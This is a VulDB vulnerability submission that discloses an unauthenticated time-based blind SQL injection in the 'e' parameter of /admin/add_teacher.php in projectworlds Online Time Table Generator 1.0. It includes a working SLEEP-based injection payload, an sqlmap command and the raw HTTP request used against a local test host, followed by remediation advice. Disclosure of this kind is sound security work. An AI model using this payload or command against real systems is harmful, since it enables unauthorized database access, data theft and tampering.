Submit #580412: projectworlds Online Time Table Generator PHP MYSQL V1.0 sqliinfo

Titleprojectworlds Online Time Table Generator PHP MYSQL V1.0 sqli
Description# DESCRIPTION - During the security review of "Online Time Table Generator PHP MYSQL",I discovered a critical SQL injection vulnerability in the "/admin/add_teacher.php" file. This vulnerability stems from insufficient user input validation of the 'e' parameter, allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login or authorization is required to exploit this vulnerability # Vulnerability details and POC ## Vulnerability lonameion: - 'e' parameter ## Payload: ```makefile Parameter: MULTIPART e ((custom) POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="n" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="e" [email protected]' AND (SELECT 2585 FROM (SELECT(SLEEP(5)))LRCB) AND 'ZAHI'='ZAHI ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="p" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="m" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="a" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="save" Add Teacher ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6-- ``` ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash 《python sqlmap.py -r sqli.txt -p e --dbms=mysql --batch》 ``` <img width="803" alt="Image" src="https://github.com/hhhanxx/attack/blob/main/Snipaste_2025-05-19_10-37-24.png?raw=true" /> sqli.txt: ``` POST /admin/add_teacher.php HTTP/1.1 Host: 192.168.137.1:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Length: 701 Origin: http://192.168.137.1:8000 Connection: close Referer: http://192.168.137.1:8000/admin/add_teacher.php Cookie: PHPSESSID=i98ggi13qjkm6fk3rts3ah3r23 Upgrade-Insecure-Requests: 1 Priority: u=0, i ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="n" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="e" [email protected] ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="p" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="m" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="a" ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6 Content-Disposition: form-data; name="save" Add Teacher ------geckoformboundary5f627f4c1d1c28ef7a415d3a53debff6-- ``` # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
Source⚠️ https://github.com/hhhanxx/attack/issues/18
User
 attackxuu (UID 85453)
Submission05/19/2025 04:39 (1 Year ago)
Moderation05/20/2025 15:39 (1 day later)
StatusAccepted
VulDB entry309662 [projectworlds Online Time Table Generator 1.0 /admin/add_teacher.php sql injection]
Points20

PreviousOverviewNext

Do you want to use VulDB in your project?

Use the official API to access entries easily!